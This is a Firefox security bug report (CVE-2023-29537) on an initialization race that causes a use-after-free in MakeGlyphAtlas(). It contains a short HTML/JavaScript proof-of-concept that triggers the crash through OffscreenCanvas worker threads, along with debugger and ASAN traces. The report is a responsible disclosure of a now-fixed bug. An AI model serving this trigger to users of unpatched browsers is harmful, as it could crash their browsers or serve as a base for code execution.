Closed Bug 1823365 (CVE-2023-29537) Opened 1 year ago Closed 1 year ago

initialization race leading to use after free in MakeGlyphAtlas()

Categories

(Core :: Graphics: Text, defect)

Product:
Core
Component:
Graphics: Text
Version:
Firefox 113
Type:
defect

Tracking

()

Status:
VERIFIED FIXED
Milestone:
113 Branch
Tracking Flags:
Tracking Status
firefox-esr102 --- unaffected
firefox111 --- wontfix
firefox112 + verified
firefox113 + verified

People

(Reporter: loobenyang, Assigned: jfkthame)

References

(Regressed 1 open bug)

Details

(Keywords: csectype-race, sec-high, testcase, Whiteboard: [adv-main112+])

Attachments

(6 files)

UAF_MakeGlyphAtlas_PoC.html
578 bytes, text/html
Details
tsan.txt
55.41 KB, text/plain
Details
Bug 1823365 - Clean up management of missing-glyph atlas.
48 bytes, text/x-phabricator-request
tjr
: sec-approval+
Details | Review
tsan_with_patch.txt
69.12 KB, text/plain
Details
Bug 1823365 - Clean up management of missing-glyph atlas.
48 bytes, text/x-phabricator-request
diannaS
: approval-mozilla-beta+
Details | Review
advisory.txt
185 bytes, text/plain
Details

VULNERABILITY DETAILS
Specifically crafted HTML file can trigger Use After Free in GFX code MakeGlyphAtlas(). This bug can potentially be exploited to achieve one click Remote Code Execution in content process.

gGlyphMask is static variable in gfxFontMissingGlyphs.cpp, so it's intended to be initialized/constructed once only.

	static RefPtr<SourceSurface> gGlyphMask;

However, the code inside function MakeGlyphAtlas() in file gfxFontMissingGlyphs.cpp is subject to race condition.

		static bool MakeGlyphAtlas(const DeviceColor& aColor) {
		...
		  if (!gGlyphMask) {
			gGlyphMask = gGlyphDrawTarget->CreateSourceSurfaceFromData(
		...
		}

When JS script like ctx0.fillText("&#9175;&#9856;&cent;") from the PoC is called from web worker. MakeGlyphAtlas() is executed in worker thread.

If two threads check gGlyphMask and gGlyphMask is null in both cases, then they both satisfy the if clause of if (!gGlyphMask), and try to call CreateSourceSurfaceFromData() to create a new SourceSurfaceSkia object and assign it as RefPtr to gGlyphMask. One thread executes CreateSourceSurfaceFromData() sooner and creates an SourceSurfaceSkia object first. Then when the second thread executes CreateSourceSurfaceFromData() and try to assign the newly created second SourceSurfaceSkia object to gGlyphMask, gGlyphMask is not null (different from when it's being null check), so the assignment ("=") operation would release the firstly created SourceSurfaceSkia object.

After that, when the first thread continues to execute the subsequent code, the operations against gGlyphMask are Use After Free:

gGlyphDrawTarget->MaskSurface(ColorPattern(aColor), gGlyphMask, Point(0, 0),
							DrawOptions(1.0f, CompositionOp::OP_SOURCE));

VERSION
Firefox 113.0a1 (2023-03-19) (64-bit)
OS Windows 11 Home 22H2 (Build 22621.1413)

REPRODUCTION CASE (UAF_MakeGlyphAtlas_PoC.html)

<script>
	workers = [];
	workerCode = 'offscreenCanvas0 = new OffscreenCanvas(100, 100); \n'
	workerCode += 'ctx0 = offscreenCanvas0.getContext("2d"); \n'
	workerCode += 'setTimeout(function(){ctx0.fillText("&#9175;&#9856;&cent;",  47,15);}, 2);\n'
	workerCode += 'setTimeout(function(){ctx0.fillText("&#9175;&#9856;&cent;",  47,15);}, 1);\n'

	for(var i = 0; i < 10; i++)
	{
		var blob = new Blob([workerCode],{type: "text/javascript"});
		workers[i] = new Worker(window.URL.createObjectURL(blob));
	}

	setTimeout(function(){location.reload();},300); 
	</script>

Type of crash: content process
Crash State:

(4048.ee0): Access violation - code c0000005 (!!! second chance !!!)
xul!mozilla::gfx::GetSkImageForSurface+0x36:
00007ff9`d1774436 488b4008        mov     rax,qword ptr [rax+8] ds:e5e5e5e5`e5e5e5ed=????????????????
9:318> r
rax=e5e5e5e5e5e5e5e5 rbx=000000ffebb7ac10 rcx=000000ffebb7abf8
rdx=000002d63522d800 rsi=000000ffebb7abf8 rdi=000002d63522d800
rip=00007ff9d1774436 rsp=000000ffebb7aa50 rbp=0000000000000000
 r8=000000ffebb7ac10  r9=0000000000000000 r10=00000fff3a159cf2
r11=0014000000000400 r12=000002d63522d800 r13=000002d6352a7700
r14=000000ffebb7ac20 r15=000000ffebb7adc0
iopl=0         nv up ei pl nz na po nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010204
xul!mozilla::gfx::GetSkImageForSurface+0x36:
00007ff9`d1774436 488b4008        mov     rax,qword ptr [rax+8] ds:e5e5e5e5`e5e5e5ed=????????????????
9:318> dv
	   aSurface = 0x000002d6`3522d800
		  aLock = 0x000000ff`ebb7ac10 Nothing
		aBounds = <value unavailable>
		aMatrix = <value unavailable>
			map = struct mozilla::gfx::DataSourceSurface::MappedSurface
		 pixmap = class SkPixmap
		  image = class sk_sp<SkImage>
	dataSurface = <value unavailable>
	releaseProc = <value unavailable>
		   surf = <value unavailable>
9:318> k
 # Child-SP          RetAddr           Call Site
00 000000ff`ebb7aa50 00007ff9`d177638c xul!mozilla::gfx::GetSkImageForSurface+0x36 [/builds/worker/checkouts/gecko/gfx/2d/DrawTargetSkia.cpp @ 246] 
01 (Inline Function) --------`-------- xul!mozilla::gfx::ExtractAlphaForSurface+0xb [/builds/worker/checkouts/gecko/gfx/2d/DrawTargetSkia.cpp @ 460] 
02 000000ff`ebb7abd0 00007ff9`d18d527e xul!mozilla::gfx::DrawTargetSkia::MaskSurface+0x12c [/builds/worker/checkouts/gecko/gfx/2d/DrawTargetSkia.cpp @ 1441] 
03 (Inline Function) --------`-------- xul!MakeGlyphAtlas+0x1b1 [/builds/worker/checkouts/gecko/gfx/thebes/gfxFontMissingGlyphs.cpp @ 112] 
04 (Inline Function) --------`-------- xul!GetGlyphAtlas+0x222 [/builds/worker/checkouts/gecko/gfx/thebes/gfxFontMissingGlyphs.cpp @ 131] 
05 000000ff`ebb7ad70 00007ff9`d18c062a xul!gfxFontMissingGlyphs::DrawMissingGlyph+0x4fe [/builds/worker/checkouts/gecko/gfx/thebes/gfxFontMissingGlyphs.cpp @ 418] 
06 000000ff`ebb7aef0 00007ff9`d0b29ef9 xul!gfxFont::DrawMissingGlyph+0x3ba [/builds/worker/checkouts/gecko/gfx/thebes/gfxFont.cpp @ 2202] 
07 (Inline Function) --------`-------- xul!gfxFont::DrawGlyphs+0x1be5 [/builds/worker/checkouts/gecko/gfx/thebes/gfxFont.cpp @ 2030] 
08 000000ff`ebb7b050 00007ff9`d0a177b9 xul!gfxFont::Draw+0x2179 [/builds/worker/checkouts/gecko/gfx/thebes/gfxFont.cpp @ 2530] 
09 (Inline Function) --------`-------- xul!gfxTextRun::DrawGlyphs+0x5c [/builds/worker/checkouts/gecko/gfx/thebes/gfxTextRun.cpp @ 429] 
0a 000000ff`ebb7bb10 00007ff9`d22906e6 xul!gfxTextRun::Draw+0x4b9 [/builds/worker/checkouts/gecko/gfx/thebes/gfxTextRun.cpp @ 683] 
0b 000000ff`ebb7cbf0 00007ff9`d2f4defc xul!mozilla::dom::CanvasBidiProcessor::DrawText+0x576 [/builds/worker/checkouts/gecko/dom/canvas/CanvasRenderingContext2D.cpp @ 4124] 
0c 000000ff`ebb7ce70 00007ff9`d2f4d8fd xul!nsBidiPresUtils::ProcessSimpleRun+0x11c [/builds/worker/checkouts/gecko/layout/base/nsBidiPresUtils.cpp @ 2390] 
0d 000000ff`ebb7cf80 00007ff9`d224b3cf xul!nsBidiPresUtils::ProcessText+0x1dd [/builds/worker/checkouts/gecko/layout/base/nsBidiPresUtils.cpp @ 2165] 
0e 000000ff`ebb7d140 00007ff9`d224a72a xul!mozilla::dom::CanvasRenderingContext2D::DrawOrMeasureText+0xc9f [/builds/worker/checkouts/gecko/dom/canvas/CanvasRenderingContext2D.cpp @ 4448] 
0f 000000ff`ebb7d400 00007ff9`d1c9c15a xul!mozilla::dom::CanvasRenderingContext2D::FillText+0x2a [/builds/worker/checkouts/gecko/dom/canvas/CanvasRenderingContext2D.cpp @ 3863] 
10 000000ff`ebb7d440 00007ff9`d0831055 xul!mozilla::dom::OffscreenCanvasRenderingContext2D_Binding::fillText+0x2ea [/builds/worker/workspace/obj-build/dom/bindings/OffscreenCanvasRenderingContext2DBinding.cpp @ 3904] 
11 000000ff`ebb7d5a0 00007ff9`d0eb9e19 xul!mozilla::dom::binding_detail::GenericMethod<mozilla::dom::binding_detail::NormalThisPolicy,mozilla::dom::binding_detail::ThrowExceptions>+0x145 [/builds/worker/checkouts/gecko/dom/bindings/BindingUtils.cpp @ 3318] 
12 (Inline Function) --------`-------- xul!CallJSNative+0x181 [/builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp @ 459] 
13 (Inline Function) --------`-------- xul!js::InternalCallOrConstruct+0x569 [/builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp @ 553] 
14 (Inline Function) --------`-------- xul!InternalCall+0x569 [/builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp @ 620] 
15 (Inline Function) --------`-------- xul!js::CallFromStack+0x569 [/builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp @ 625] 
16 000000ff`ebb7d660 00007ff9`d08a0a55 xul!Interpret+0xd479 [/builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp @ 3368] 
17 (Inline Function) --------`-------- xul!js::RunScript+0x5c2 [/builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp @ 431] 
18 (Inline Function) --------`-------- xul!js::InternalCallOrConstruct+0x6ea [/builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp @ 585] 
19 (Inline Function) --------`-------- xul!InternalCall+0x6ea [/builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp @ 620] 
1a 000000ff`ebb7db20 00007ff9`d094ab9f xul!js::Call+0x755 [/builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp @ 652] 
1b 000000ff`ebb7dc30 00007ff9`cf260440 xul!JS::Call+0x2bf [/builds/worker/checkouts/gecko/js/src/vm/CallAndConstruct.cpp @ 117] 
1c 000000ff`ebb7dd60 00007ff9`cfba8d05 xul!mozilla::dom::Function::Call+0x1a0 [/builds/worker/workspace/obj-build/dom/bindings/FunctionBinding.cpp @ 50] 
1d (Inline Function) --------`-------- xul!mozilla::dom::Function::Call+0x144 [/builds/worker/workspace/obj-build/dist/include/mozilla/dom/FunctionBinding.h @ 71] 
1e 000000ff`ebb7dec0 00007ff9`d2b86376 xul!mozilla::dom::CallbackTimeoutHandler::Call+0x1c5 [/builds/worker/checkouts/gecko/dom/base/TimeoutHandler.cpp @ 167] 
1f 000000ff`ebb7e1a0 00007ff9`cf0da944 xul!mozilla::dom::WorkerPrivate::RunExpiredTimeouts+0x486 [/builds/worker/checkouts/gecko/dom/workers/WorkerPrivate.cpp @ 5163] 
20 000000ff`ebb7e330 00007ff9`cf782505 xul!mozilla::dom::WorkerRunnable::Run+0x1a4 [/builds/worker/checkouts/gecko/dom/workers/WorkerRunnable.cpp @ 377] 
21 (Inline Function) --------`-------- xul!nsTimerImpl::Fire::<lambda_2>::operator()+0x1d [/builds/worker/checkouts/gecko/xpcom/threads/nsTimerImpl.cpp @ 656] 
22 (Inline Function) --------`-------- xul!mozilla::detail::VariantImplementation<unsigned char,1,nsCOMPtr<nsITimerCallback>,nsCOMPtr<nsIObserver>,nsTimerImpl::FuncCallback,nsTimerImpl::ClosureCallback>::matchN+0x173 [/builds/worker/workspace/obj-build/dist/include/mozilla/Variant.h @ 309] 
23 (Inline Function) --------`-------- xul!mozilla::detail::VariantImplementation<unsigned char,0,nsTimerImpl::UnknownCallback,nsCOMPtr<nsITimerCallback>,nsCOMPtr<nsIObserver>,nsTimerImpl::FuncCallback,nsTimerImpl::ClosureCallback>::matchN+0x184 [/builds/worker/workspace/obj-build/dist/include/mozilla/Variant.h @ 318] 
24 (Inline Function) --------`-------- xul!mozilla::Variant<nsTimerImpl::UnknownCallback,nsCOMPtr<nsITimerCallback>,nsCOMPtr<nsIObserver>,nsTimerImpl::FuncCallback,nsTimerImpl::ClosureCallback>::matchN+0x184 [/builds/worker/workspace/obj-build/dist/include/mozilla/Variant.h @ 902] 
25 (Inline Function) --------`-------- xul!mozilla::Variant<nsTimerImpl::UnknownCallback,nsCOMPtr<nsITimerCallback>,nsCOMPtr<nsIObserver>,nsTimerImpl::FuncCallback,nsTimerImpl::ClosureCallback>::match+0x184 [/builds/worker/workspace/obj-build/dist/include/mozilla/Variant.h @ 857] 
26 000000ff`ebb7e4d0 00007ff9`cf773b73 xul!nsTimerImpl::Fire+0x3a5 [/builds/worker/checkouts/gecko/xpcom/threads/nsTimerImpl.cpp @ 654] 
27 000000ff`ebb7e660 00007ff9`d2b8c62a xul!nsTimerEvent::Run+0x63 [/builds/worker/checkouts/gecko/xpcom/threads/TimerThread.cpp @ 469] 
28 000000ff`ebb7e840 00007ff9`cf0da944 xul!mozilla::dom::`anonymous namespace'::ExternalRunnableWrapper::WorkerRun+0x2a [/builds/worker/checkouts/gecko/dom/workers/WorkerPrivate.cpp @ 201] 
29 000000ff`ebb7e8a0 00007ff9`d07d9dce xul!mozilla::dom::WorkerRunnable::Run+0x1a4 [/builds/worker/checkouts/gecko/dom/workers/WorkerRunnable.cpp @ 377] 
2a 000000ff`ebb7ea40 00007ff9`d07eeb9e xul!nsThread::ProcessNextEvent+0x106e [/builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp @ 1234] 
2b 000000ff`ebb7ede0 00007ff9`cf0da19c xul!NS_ProcessNextEvent+0x3e [/builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp @ 477] 
2c 000000ff`ebb7ee30 00007ff9`cfeabbe2 xul!mozilla::dom::WorkerPrivate::DoRunLoop+0x1cc [/builds/worker/checkouts/gecko/dom/workers/WorkerPrivate.cpp @ 3281] 
2d 000000ff`ebb7ef30 00007ff9`d07d9dce xul!mozilla::dom::workerinternals::`anonymous namespace'::WorkerThreadPrimaryRunnable::Run+0x2a2 [/builds/worker/checkouts/gecko/dom/workers/RuntimeService.cpp @ 2049] 
2e 000000ff`ebb7f0c0 00007ff9`d07d8985 xul!nsThread::ProcessNextEvent+0x106e [/builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp @ 1234] 
2f (Inline Function) --------`-------- xul!NS_ProcessNextEvent+0x29 [/builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp @ 477] 
30 000000ff`ebb7f460 00007ff9`cf93340f xul!mozilla::ipc::MessagePumpForNonMainThreads::Run+0xf5 [/builds/worker/checkouts/gecko/ipc/glue/MessagePump.cpp @ 300] 
31 (Inline Function) --------`-------- xul!MessageLoop::RunInternal+0x16 [/builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc @ 381] 
32 000000ff`ebb7f510 00007ff9`cef5fc7e xul!MessageLoop::RunHandler+0x2f [/builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc @ 375] 
33 000000ff`ebb7f560 00007ff9`cf775f03 xul!MessageLoop::Run+0x4e [/builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc @ 357] 
34 000000ff`ebb7f5c0 00007ffa`0ebc577c xul!nsThread::ThreadFunc+0xe3 [/builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp @ 393] 
35 000000ff`ebb7f780 00007ffa`0ec4a411 nss3!_PR_NativeRunThread+0x13c [/builds/worker/checkouts/gecko/nsprpub/pr/src/threads/combined/pruthr.c @ 421] 
36 000000ff`ebb7f800 00007ffa`5c849363 nss3!pr_root+0x11 [/builds/worker/checkouts/gecko/nsprpub/pr/src/md/windows/w95thred.c @ 140] 
37 000000ff`ebb7f830 00007ffa`5dc626bd ucrtbase!thread_start<unsigned int (__cdecl*)(void *),1>+0x93
38 000000ff`ebb7f860 00007ffa`1f6251c8 KERNEL32!BaseThreadInitThunk+0x1d
39 (Inline Function) --------`-------- mozglue!mozilla::interceptor::FuncHook<mozilla::interceptor::WindowsDllInterceptor<mozilla::interceptor::VMSharingPolicyShared>,void (*)(int, void *, void *)>::operator()+0x15 [/builds/worker/checkouts/gecko/toolkit/xre/dllservices/mozglue/nsWindowsDllInterceptor.h @ 150] 
3a 000000ff`ebb7f890 00007ffa`5ecca9f8 mozglue!patched_BaseThreadInitThunk+0x28 [/builds/worker/checkouts/gecko/toolkit/xre/dllservices/mozglue/WindowsDllBlocklist.cpp @ 592] 
3b 000000ff`ebb7f900 00000000`00000000 ntdll!RtlUserThreadStart+0x28
9:318> dx -id 0,9 -r1 ((xul!mozilla::gfx::SourceSurface *)0x2d63522d800)
((xul!mozilla::gfx::SourceSurface *)0x2d63522d800)                 : 0x2d63522d800 [Type: mozilla::gfx::SourceSurface *]
	[+0x008] mWeakRef         [Type: RefPtr<mozilla::detail::ThreadSafeWeakReference>]
	[+0x010] mUserData        [Type: mozilla::gfx::ThreadSafeUserData]
9:318> dx -id 0,9 -r1 (*((xul!RefPtr<mozilla::detail::ThreadSafeWeakReference> *)0x2d63522d808))
(*((xul!RefPtr<mozilla::detail::ThreadSafeWeakReference> *)0x2d63522d808))                 [Type: RefPtr<mozilla::detail::ThreadSafeWeakReference>]
	[+0x000] mRawPtr          : 0xe5e5e5e5e5e5e5e5 [Type: mozilla::detail::ThreadSafeWeakReference *]
9:318> dx -id 0,9 -r1 ((xul!mozilla::detail::ThreadSafeWeakReference *)0xe5e5e5e5e5e5e5e5)
((xul!mozilla::detail::ThreadSafeWeakReference *)0xe5e5e5e5e5e5e5e5)                 : 0xe5e5e5e5e5e5e5e5 [Type: mozilla::detail::ThreadSafeWeakReference *]
	[+0x000] mRefCnt          [Type: mozilla::detail::RC<unsigned long long,0>]
	[+0x008] mStrongCnt       [Type: mozilla::detail::RC<unsigned long long,0>]
	[+0x010] mPtr             : Unable to read memory at Address 0xe5e5e5e5e5e5e5f5

CREDIT INFORMATION
Reporter credit: Looben Yang

I also run the PoC on the official Firefox ASAN build. Here is the ASAN report for your easier assessment:

113.0a1 (2023-03-19) (64-bit)

=================================================================
==18340==ERROR: AddressSanitizer: heap-use-after-free on address 0x12709a7ebec0 at pc 0x7ff9b892b6ca bp 0x00ff60bf4d20 sp 0x00ff60bf4d68
READ of size 8 at 0x12709a7ebec0 thread T26
    #0 0x7ff9b892b6c9 in mozilla::gfx::GetSkImageForSurface /builds/worker/checkouts/gecko/gfx/2d/DrawTargetSkia.cpp:246
    #1 0x7ff9b89373fb in mozilla::gfx::DrawTargetSkia::MaskSurface /builds/worker/checkouts/gecko/gfx/2d/DrawTargetSkia.cpp:1441
    #2 0x7ff9b923c31e in gfxFontMissingGlyphs::DrawMissingGlyph /builds/worker/checkouts/gecko/gfx/thebes/gfxFontMissingGlyphs.cpp:418
    #3 0x7ff9b91ce249 in gfxFont::DrawMissingGlyph /builds/worker/checkouts/gecko/gfx/thebes/gfxFont.cpp:2202
    #4 0x7ff9b91d8338 in gfxFont::DrawGlyphs<0,0> /builds/worker/checkouts/gecko/gfx/thebes/gfxFont.cpp:2030
    #5 0x7ff9b91d1e8d in gfxFont::Draw /builds/worker/checkouts/gecko/gfx/thebes/gfxFont.cpp:2530
    #6 0x7ff9b9293f6a in gfxTextRun::Draw /builds/worker/checkouts/gecko/gfx/thebes/gfxTextRun.cpp:683
    #7 0x7ff9bc86e121 in mozilla::dom::CanvasBidiProcessor::DrawText /builds/worker/checkouts/gecko/dom/canvas/CanvasRenderingContext2D.cpp:4123
    #8 0x7ff9c11c9b54 in nsBidiPresUtils::ProcessSimpleRun /builds/worker/checkouts/gecko/layout/base/nsBidiPresUtils.cpp:2387
    #9 0x7ff9c11c90ea in nsBidiPresUtils::ProcessText /builds/worker/checkouts/gecko/layout/base/nsBidiPresUtils.cpp:2165
    #10 0x7ff9bc71197c in mozilla::dom::CanvasRenderingContext2D::DrawOrMeasureText /builds/worker/checkouts/gecko/dom/canvas/CanvasRenderingContext2D.cpp:4448
    #11 0x7ff9bc70f9d9 in mozilla::dom::CanvasRenderingContext2D::FillText /builds/worker/checkouts/gecko/dom/canvas/CanvasRenderingContext2D.cpp:3860
    #12 0x7ff9baa76ed4 in mozilla::dom::OffscreenCanvasRenderingContext2D_Binding::fillText /builds/worker/workspace/obj-build/dom/bindings/OffscreenCanvasRenderingContext2DBinding.cpp:3904
    #13 0x7ff9bc53b092 in mozilla::dom::binding_detail::GenericMethod<mozilla::dom::binding_detail::NormalThisPolicy,mozilla::dom::binding_detail::ThrowExceptions> /builds/worker/checkouts/gecko/dom/bindings/BindingUtils.cpp:3318
    #14 0x7ff9c73ba9d3 in js::InternalCallOrConstruct /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:553
    #15 0x7ff9c73a5ccc in Interpret /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:3368
    #16 0x7ff9c7391506 in js::RunScript /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:431
    #17 0x7ff9c73bab0d in js::InternalCallOrConstruct /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:585
    #18 0x7ff9c73bc9f1 in js::Call /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:652
    #19 0x7ff9c57cbe00 in JS::Call /builds/worker/checkouts/gecko/js/src/vm/CallAndConstruct.cpp:117
    #20 0x7ff9bc09aacd in mozilla::dom::Function::Call /builds/worker/workspace/obj-build/dom/bindings/FunctionBinding.cpp:50
    #21 0x7ff9b9e3cc99 in mozilla::dom::Function::Call<nsCOMPtr<nsIGlobalObject> > /builds/worker/workspace/obj-build/dist/include/mozilla/dom/FunctionBinding.h:71
    #22 0x7ff9b9e3c609 in mozilla::dom::CallbackTimeoutHandler::Call /builds/worker/checkouts/gecko/dom/base/TimeoutHandler.cpp:167
    #23 0x7ff9bfb7886c in mozilla::dom::WorkerPrivate::RunExpiredTimeouts /builds/worker/checkouts/gecko/dom/workers/WorkerPrivate.cpp:5163
    #24 0x7ff9bfb864eb in mozilla::dom::WorkerRunnable::Run /builds/worker/checkouts/gecko/dom/workers/WorkerRunnable.cpp:377
    #25 0x7ff9b68bed58 in nsTimerImpl::Fire /builds/worker/checkouts/gecko/xpcom/threads/nsTimerImpl.cpp:654
    #26 0x7ff9b685ba48 in nsTimerEvent::Run /builds/worker/checkouts/gecko/xpcom/threads/TimerThread.cpp:469
    #27 0x7ff9bfb9bbe0 in mozilla::dom::`anonymous namespace'::ExternalRunnableWrapper::WorkerRun /builds/worker/checkouts/gecko/dom/workers/WorkerPrivate.cpp:201
    #28 0x7ff9bfb864eb in mozilla::dom::WorkerRunnable::Run /builds/worker/checkouts/gecko/dom/workers/WorkerRunnable.cpp:377
    #29 0x7ff9b687938d in nsThread::ProcessNextEvent /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:1233
    #30 0x7ff9b6887f5d in NS_ProcessNextEvent /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp:477
    #31 0x7ff9bfb64d64 in mozilla::dom::WorkerPrivate::DoRunLoop /builds/worker/checkouts/gecko/dom/workers/WorkerPrivate.cpp:3279
    #32 0x7ff9bfb385c8 in mozilla::dom::workerinternals::`anonymous namespace'::WorkerThreadPrimaryRunnable::Run /builds/worker/checkouts/gecko/dom/workers/RuntimeService.cpp:2043
    #33 0x7ff9b687938d in nsThread::ProcessNextEvent /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:1233
    #34 0x7ff9b6887f5d in NS_ProcessNextEvent /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp:477
    #35 0x7ff9b7f3150e in mozilla::ipc::MessagePumpForNonMainThreads::Run /builds/worker/checkouts/gecko/ipc/glue/MessagePump.cpp:300
    #36 0x7ff9b7e47432 in MessageLoop::RunHandler /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:374
    #37 0x7ff9b7e47207 in MessageLoop::Run /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:356
    #38 0x7ff9b686ed3c in nsThread::ThreadFunc /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:391
    #39 0x7ff9d5c152c5 in _PR_NativeRunThread /builds/worker/checkouts/gecko/nsprpub/pr/src/threads/combined/pruthr.c:399
    #40 0x7ff9d5beedab in pr_root /builds/worker/checkouts/gecko/nsprpub/pr/src/md/windows/w95thred.c:139
    #41 0x7ffa5c849362 in recalloc+0xa2 (C:\WINDOWS\System32\ucrtbase.dll+0x180029362)
    #42 0x7ff9d5feabb3 in __asan::AsanThread::ThreadStart /builds/worker/fetches/llvm-project/compiler-rt/lib/asan/asan_thread.cpp:277
    #43 0x7ffa5dc626bc in BaseThreadInitThunk+0x1c (C:\WINDOWS\System32\KERNEL32.DLL+0x1800126bc)
    #44 0x7ffa21bba5ae in patched_BaseThreadInitThunk /builds/worker/checkouts/gecko/toolkit/xre/dllservices/mozglue/WindowsDllBlocklist.cpp:592
    #45 0x7ffa5ecca9f7 in RtlUserThreadStart+0x27 (C:\WINDOWS\SYSTEM32\ntdll.dll+0x18005a9f7)

0x12709a7ebec0 is located 0 bytes inside of 128-byte region [0x12709a7ebec0,0x12709a7ebf40)
freed by thread T32 here:
    #0 0x7ff9d5fdeeec in free /builds/worker/fetches/llvm-project/compiler-rt/lib/asan/asan_malloc_win.cpp:82
    #1 0x7ff9b8a255ec in mozilla::gfx::SourceSurfaceSkia::~SourceSurfaceSkia /builds/worker/checkouts/gecko/gfx/2d/SourceSurfaceSkia.cpp:25
    #2 0x7ff9b923c1a4 in gfxFontMissingGlyphs::DrawMissingGlyph /builds/worker/checkouts/gecko/gfx/thebes/gfxFontMissingGlyphs.cpp:418
    #3 0x7ff9b91ce249 in gfxFont::DrawMissingGlyph /builds/worker/checkouts/gecko/gfx/thebes/gfxFont.cpp:2202
    #4 0x7ff9b91d8338 in gfxFont::DrawGlyphs<0,0> /builds/worker/checkouts/gecko/gfx/thebes/gfxFont.cpp:2030
    #5 0x7ff9b91d1e8d in gfxFont::Draw /builds/worker/checkouts/gecko/gfx/thebes/gfxFont.cpp:2530
    #6 0x7ff9b9293f6a in gfxTextRun::Draw /builds/worker/checkouts/gecko/gfx/thebes/gfxTextRun.cpp:683
    #7 0x7ff9bc86e121 in mozilla::dom::CanvasBidiProcessor::DrawText /builds/worker/checkouts/gecko/dom/canvas/CanvasRenderingContext2D.cpp:4123
    #8 0x7ff9c11c9b54 in nsBidiPresUtils::ProcessSimpleRun /builds/worker/checkouts/gecko/layout/base/nsBidiPresUtils.cpp:2387
    #9 0x7ff9c11c90ea in nsBidiPresUtils::ProcessText /builds/worker/checkouts/gecko/layout/base/nsBidiPresUtils.cpp:2165
    #10 0x7ff9bc71197c in mozilla::dom::CanvasRenderingContext2D::DrawOrMeasureText /builds/worker/checkouts/gecko/dom/canvas/CanvasRenderingContext2D.cpp:4448
    #11 0x7ff9bc70f9d9 in mozilla::dom::CanvasRenderingContext2D::FillText /builds/worker/checkouts/gecko/dom/canvas/CanvasRenderingContext2D.cpp:3860
    #12 0x7ff9baa76ed4 in mozilla::dom::OffscreenCanvasRenderingContext2D_Binding::fillText /builds/worker/workspace/obj-build/dom/bindings/OffscreenCanvasRenderingContext2DBinding.cpp:3904
    #13 0x7ff9bc53b092 in mozilla::dom::binding_detail::GenericMethod<mozilla::dom::binding_detail::NormalThisPolicy,mozilla::dom::binding_detail::ThrowExceptions> /builds/worker/checkouts/gecko/dom/bindings/BindingUtils.cpp:3318
    #14 0x7ff9c73ba9d3 in js::InternalCallOrConstruct /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:553
    #15 0x7ff9c73a5ccc in Interpret /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:3368
    #16 0x7ff9c7391506 in js::RunScript /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:431
    #17 0x7ff9c73bab0d in js::InternalCallOrConstruct /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:585
    #18 0x7ff9c73bc9f1 in js::Call /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:652
    #19 0x7ff9c57cbe00 in JS::Call /builds/worker/checkouts/gecko/js/src/vm/CallAndConstruct.cpp:117
    #20 0x7ff9bc09aacd in mozilla::dom::Function::Call /builds/worker/workspace/obj-build/dom/bindings/FunctionBinding.cpp:50
    #21 0x7ff9b9e3cc99 in mozilla::dom::Function::Call<nsCOMPtr<nsIGlobalObject> > /builds/worker/workspace/obj-build/dist/include/mozilla/dom/FunctionBinding.h:71
    #22 0x7ff9b9e3c609 in mozilla::dom::CallbackTimeoutHandler::Call /builds/worker/checkouts/gecko/dom/base/TimeoutHandler.cpp:167
    #23 0x7ff9bfb7886c in mozilla::dom::WorkerPrivate::RunExpiredTimeouts /builds/worker/checkouts/gecko/dom/workers/WorkerPrivate.cpp:5163
    #24 0x7ff9bfb864eb in mozilla::dom::WorkerRunnable::Run /builds/worker/checkouts/gecko/dom/workers/WorkerRunnable.cpp:377
    #25 0x7ff9b68bed58 in nsTimerImpl::Fire /builds/worker/checkouts/gecko/xpcom/threads/nsTimerImpl.cpp:654
    #26 0x7ff9b685ba48 in nsTimerEvent::Run /builds/worker/checkouts/gecko/xpcom/threads/TimerThread.cpp:469
    #27 0x7ff9bfb9bbe0 in mozilla::dom::`anonymous namespace'::ExternalRunnableWrapper::WorkerRun /builds/worker/checkouts/gecko/dom/workers/WorkerPrivate.cpp:201

previously allocated by thread T25 here:
    #0 0x7ff9d5fdeffc in malloc /builds/worker/fetches/llvm-project/compiler-rt/lib/asan/asan_malloc_win.cpp:98
    #1 0x7ffa21aa11ad in moz_xmalloc /builds/worker/checkouts/gecko/memory/mozalloc/mozalloc.cpp:52
    #2 0x7ff9b8938d99 in mozilla::gfx::DrawTargetSkia::CreateSourceSurfaceFromData /builds/worker/checkouts/gecko/gfx/2d/DrawTargetSkia.cpp:1558
    #3 0x7ff9b923c0f4 in gfxFontMissingGlyphs::DrawMissingGlyph /builds/worker/checkouts/gecko/gfx/thebes/gfxFontMissingGlyphs.cpp:418
